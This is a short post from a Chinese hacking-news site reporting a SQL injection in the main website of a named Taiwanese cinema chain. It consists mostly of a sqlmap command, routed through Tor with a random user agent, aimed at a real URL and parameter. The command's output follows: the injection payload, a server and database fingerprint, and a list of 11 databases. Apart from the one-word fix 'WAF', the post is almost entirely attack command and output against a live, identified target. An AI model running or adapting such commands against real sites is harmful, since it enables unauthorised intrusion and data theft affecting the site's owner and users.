记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

台湾某连锁影城主站SQL注入涉及11个库

2015-07-02 02:35

台湾某连锁影城主站SQL注入涉及11个库


$ ./sqlmap.py --tor --tor-type=SOCKS5 --random-agent --time-sec=20 --threads 2 --technique=BEUT -u "www.cinemark.com.tw/showDm.asp?id=4" --dbms=mssql --dbs
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=4 AND 1628=1628
Vector: AND [INFERENCE]
---
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, Microsoft IIS 8.5, ASP
back-end DBMS: Microsoft SQL Server 2005

available databases [11]:
[*] cinema7
[*] DA02072673
[*] DA10022673
[*] fashionMemory
[*] fubon
[*] jade
[*] lisin_music
[*] master
[*] model
[*] msdb
[*] tempdb

 

解决方案:

WAF

 
知识来源: www.2cto.com/Article/201507/412850.html

阅读:77416 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“台湾某连锁影城主站SQL注入涉及11个库”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云